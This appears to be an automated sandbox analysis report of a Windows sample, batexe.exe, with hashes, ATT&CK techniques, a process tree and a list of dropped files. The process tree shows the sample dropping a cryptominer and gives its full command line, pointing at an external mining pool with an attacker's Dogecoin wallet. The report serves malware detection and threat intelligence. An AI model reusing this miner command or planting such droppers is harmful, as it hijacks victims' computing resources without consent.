73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 13:44

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5456	b2e.exe
3000	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3000	cpuminer-sse2.exe
3000	cpuminer-sse2.exe
3000	cpuminer-sse2.exe
3000	cpuminer-sse2.exe
3000	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2136-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2136 wrote to memory of 5456	2136	batexe.exe	85
PID 2136 wrote to memory of 5456	2136	batexe.exe	85
PID 2136 wrote to memory of 5456	2136	batexe.exe	85
PID 5456 wrote to memory of 5656	5456	b2e.exe	87
PID 5456 wrote to memory of 5656	5456	b2e.exe	87
PID 5456 wrote to memory of 5656	5456	b2e.exe	87
PID 5656 wrote to memory of 3000	5656	cmd.exe	89
PID 5656 wrote to memory of 3000	5656	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2136
- C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6DEC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5656
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe

Filesize
3.8MB

MD5
66b04d0e8cbf92cab4e2f4302e425c86

SHA1
4879f96cfaf8c636332bad371327f53acf2de98e

SHA256
6b854df91db563dda844e1fa99727aea2e31edcf2ad28905e7f94c937adac751

SHA512
95c17cdcb60ae268abc2657d3d223a89009c636568852f461d2b3c6c7197b3981080513b546429982e78840a9997aa0bb5e1d0d0b95b47d5ac719ca91f33748c

Download Submit
C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe

Filesize
795KB

MD5
2064aaaed01333f786a71a5d3aaa76a8

SHA1
bba30ec435c502370e92b13e0937f75162d93b7a

SHA256
0066dae000a66a8f77343d14f1a2e990570fc6ca788afbca764654a790f4eded

SHA512
1dadc11230bc9f01b547647ccb5645527c2cd94af27effb894dbaec348d9422fb2ea8c39f020b05db2f5eb8125e68ac183dd5fdb9a35aef156455d418bfb31cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe

Filesize
1.5MB

MD5
2a089e8bf6578017b5c976d0dacec1b8

SHA1
111f721c4eb9edb2555114a6c8d95d0bac6bf333

SHA256
7c38ff410d155d55353f7c8d0ccda5c2f63a97eadff37a99228b2cff8efddb50

SHA512
5efbe1daa3034284f68f7045fbbd4e26276165f60dca93d455772d5727deaf9ebc059a8b7b0763c6d00243fc8bbff9a197556837e71a1ecfd71e6919b8a7ecfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\6DEC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
738KB

MD5
e1db68d9b44a179ee055419f90d096cf

SHA1
aaeab4851455dfeb6a71c9e6d6692f0d22a433f6

SHA256
b4ef1eef559073e53bd57ebd497b2d60e3b6a0b0c6c5285d39ac2a1a993409d0

SHA512
f3ecec868edc0572385d0316df0a1f288a84804a4c6dddf7526afc601dbed82aaca4b13e8dea788097a409d906f954f6d39a4cb80922b9b9cd7f5c7f43b5b6a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
762KB

MD5
81075ac4faa30f6582b1e1e4e91afd42

SHA1
db7c08c97c47a01ab7f2a06c5efb72fe7895ceda

SHA256
3d073e82cacdd5df3a82cc20b2398119923ee395dd7aa7dcbad2f3926440cf54

SHA512
2d3d31b286733f9975ac62917ca0d834b5623ff820caeee2a646b9cb1cc5c38d7951045c0abba8e0451853f95f93dac06e84db62f5f7822fad5b0f9d5bdac001

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
892KB

MD5
b287ef4fdf9a90bd96ca3cd614a2c99e

SHA1
9a6cc011a1d9c037e8ff5733cd90612c74741ee8

SHA256
20d8617d2743853ef42bdde57460f296badb2768f9906c38dd17351b9267c961

SHA512
5fcbee5a76f7c5b71b24845e1a4f25a38506c4bae579be33ca679f8c60e28d6578b9d68d0175990c69ccaf12b4db38fed6dd0320da9a2289a14c149ec2d589cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
727KB

MD5
bdfcffc8fb4ac8cefc985ee53e646dcd

SHA1
981fca3bdf18cba5a431ebb15810d9ae09215970

SHA256
e066b36ee37fb4a29a6d3d7e7b2c8e528bc65e0d52031b7177373e5ca37ded44

SHA512
75dc422eb8115e43b7718e8393d112b4a72b115c8b3fe9fa2049dc3e9e02cd08cd859a2021623f046351ce64ceddea03acb8b4e65879607e524ddf4df2365630

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
981KB

MD5
3aa01d515ed8368da7600abced5e3611

SHA1
1c5b243e1bc5e305e4363db1d61ff877ccaeb0a6

SHA256
ad9e35c2bdc944b69eca5c221e22693b0fb51cf97b9a5cdaf91e0c5928fca506

SHA512
a753a7b49ec1b0ec14efe5c14b7eccdad38ee265d11c5c235e5f7269edbf22bff4ecce62820677d45379716f4f34f3048c94d57969cf79c4c4ecb56d702c16b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
775KB

MD5
9674d0b73ffe381c244de3bc20b23112

SHA1
9af4caa42ce42dc850a48185480a8b2deba2f931

SHA256
019b5f494853bf08c40f2ef7265ccc518102c63491eb087c7d687b9423e46b75

SHA512
9ab9fad4aed5ed7029719c750b01156c9b40af9bfcb4eb80360e45bf933a7e29ae46b17302c6f1371a80675f596d693349ee7e13fad64ebbae147288da36e99a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
640KB

MD5
c58ad01ab3027d98487ee26590ae312d

SHA1
17adf238c23e04896723d31f860bb18a7a0344af

SHA256
f2161130e000cd5be4d677c51cd1703598e8a5e7e1d3a6474e30d414f6e28a93

SHA512
51ddfd432926cb52fbcf474ce10ca90da56989f4e75e5f4064107c4efd728b2958717ff1008ec99b487e6b59aea40c32004769848690dccdc2052b0e293176ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2136-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3000-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3000-46-0x0000000058AD0000-0x0000000058B68000-memory.dmp

Filesize
608KB

Download
memory/3000-47-0x0000000000F10000-0x00000000027C5000-memory.dmp

Filesize
24.7MB

Download
memory/3000-53-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3000-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3000-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5456-58-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5456-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download